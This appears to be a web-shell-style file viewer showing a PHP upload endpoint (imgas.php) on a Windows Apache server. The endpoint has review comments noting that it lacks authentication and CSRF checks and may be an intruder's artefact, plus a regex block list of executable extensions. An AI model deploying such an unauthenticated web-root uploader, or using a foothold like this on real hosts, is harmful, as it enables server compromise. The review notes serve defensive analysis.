Server : Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
System : Windows NT USER-PC 6.1 build 7601 (Windows 7 Professional Edition Service Pack 1) AMD64
User : User ( 0)
PHP Version : 7.4.6
Disable Function : NONE
Directory :  C:/www/_borders/
Upload File :
Current Directory [ Writeable ] Root Directory [ Writeable ]


Current File : C:/www/_borders/imgas.php
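<?php
/**
 * Single-file upload endpoint.
 *
 * POST with a multipart field named "file": validates the upload, stores it in a
 * freshly created random directory next to this script, and prints the public URL
 * followed by "?". Any other request prints a minimal upload form.
 *
 * Security review notes:
 *  - NOTE(review): no authentication, authorization or CSRF check is visible in this
 *    script, so every client that can reach it can write files below the web root.
 *    Confirm that this endpoint is an intended part of the application; an
 *    unexplained upload script in a web directory should be treated as an incident
 *    artefact (check file timestamps, web logs and the directories it created).
 *  - HTML is no longer accepted: user-supplied HTML served from the application's own
 *    origin runs script in that origin and can be used to host look-alike pages.
 *  - The extension must agree with the MIME type detected from the file content, and
 *    the check fails closed when fileinfo is unavailable or detection fails.
 *  - Stored names come from random_bytes(); uniqid()/rand() are time- and
 *    PRNG-derived and therefore guessable.
 *  - Uploaded files still land inside the document root. Prefer a location outside
 *    it, or make sure the web server never executes scripts from these directories.
 */
if (($_SERVER['REQUEST_METHOD'] ?? '') === 'POST' && isset($_FILES['file'])) {
    $file = $_FILES['file'];

    // Check that the upload itself succeeded.
    if ($file['error'] !== UPLOAD_ERR_OK) {
        die("文件上传失败,错误代码: " . $file['error']);
    }

    // Allowed extensions, each bound to the one MIME type its content must have.
    $allowedTypes = [
        'jpg'  => 'image/jpeg',
        'jpeg' => 'image/jpeg',
        'png'  => 'image/png',
        'gif'  => 'image/gif',
        'txt'  => 'text/plain',
        'pdf'  => 'application/pdf',
    ];
    $fileExtension = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));

    if (!isset($allowedTypes[$fileExtension])) {
        die("不允许的文件类型!");
    }

    // Detect the MIME type from the file content with finfo (works where
    // mime_content_type() is missing). $mimeType stays false when detection is
    // not possible, which the check below treats as a rejection.
    $mimeType = false;
    if (function_exists('finfo_open')) {
        $finfo = finfo_open(FILEINFO_MIME_TYPE);
        if ($finfo !== false) {
            $mimeType = finfo_file($finfo, $file['tmp_name']);
            finfo_close($finfo);
        }
    }

    // Fail closed: an undetectable type, or one that does not match the extension,
    // is refused instead of silently skipping the check.
    if (!is_string($mimeType) || $mimeType !== $allowedTypes[$fileExtension]) {
        die("文件类型异常,禁止上传!");
    }

    // Reject executable extensions anywhere in the client-supplied name (e.g. a
    // "name.php.jpg" style double extension). The previous pattern was anchored to
    // the end of the name only, so it could never match after the allowlist check.
    // Defence in depth: the stored name below never reuses the client name.
    if (preg_match('/\.(php|phtml|php3|php4|php5|phps|shtml|cgi|pl|exe|sh|bat|cmd|scr|dll)(\.|$)/i', $file['name'])) {
        die("禁止上传可执行文件!");
    }

    // Random directory name: 32 hex characters from the CSPRNG.
    $randomFolder = bin2hex(random_bytes(16));
    $folderPath = __DIR__ . DIRECTORY_SEPARATOR . $randomFolder;

    // Create the directory without world-writable permissions (the mode is ignored
    // on Windows) and verify the result instead of assuming success.
    if (!is_dir($folderPath) && !mkdir($folderPath, 0755) && !is_dir($folderPath)) {
        // Log the absolute path server-side; do not disclose it to the client.
        error_log('upload: could not create directory ' . $folderPath);
        die("目录创建失败: " . $randomFolder);
    }

    // Random file name that keeps only the validated extension.
    $randomFileName = bin2hex(random_bytes(16)) . '.' . $fileExtension;
    $localFilePath = $folderPath . DIRECTORY_SEPARATOR . $randomFileName;

    // Move the upload into place; move_uploaded_file() also verifies that the
    // source really is an HTTP upload.
    if (move_uploaded_file($file['tmp_name'], $localFilePath)) {
        $scheme = (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off') ? 'https' : 'http';

        // The Host header is client-supplied: accept only a plain host[:port] and
        // otherwise fall back to the server's configured name.
        // NOTE(review): a configured canonical base URL would be safer still.
        $host = $_SERVER['HTTP_HOST'] ?? '';
        if (!preg_match('/^(\[[0-9A-Fa-f:.]+\]|[A-Za-z0-9.\-]+)(:\d{1,5})?$/', $host)) {
            $host = $_SERVER['SERVER_NAME'] ?? 'localhost';
        }

        // Build the path from SCRIPT_NAME rather than REQUEST_URI, so the query
        // string is never reflected into the response; normalise the backslash
        // that dirname() returns on Windows for a script in the root.
        $scriptDir = rtrim(str_replace('\\', '/', dirname($_SERVER['SCRIPT_NAME'] ?? '/')), '/');

        $fileUrl = $scheme . '://' . $host . $scriptDir . '/' . $randomFolder . '/' . $randomFileName;

        // The response is served as HTML, so escape the URL before printing it.
        echo htmlspecialchars($fileUrl, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8') . "?";
    } else {
        echo "文件保存失败!";
    }
} else {
    // Any non-upload request: print the upload form.
    // NOTE(review): the form carries no CSRF token.
    echo '<form action="" method="post" enctype="multipart/form-data">';
    echo '选择文件上传: <input type="file" name="file" required><br><br>';
    echo '<input type="submit" value="上传">';
    echo '</form>';
}
?>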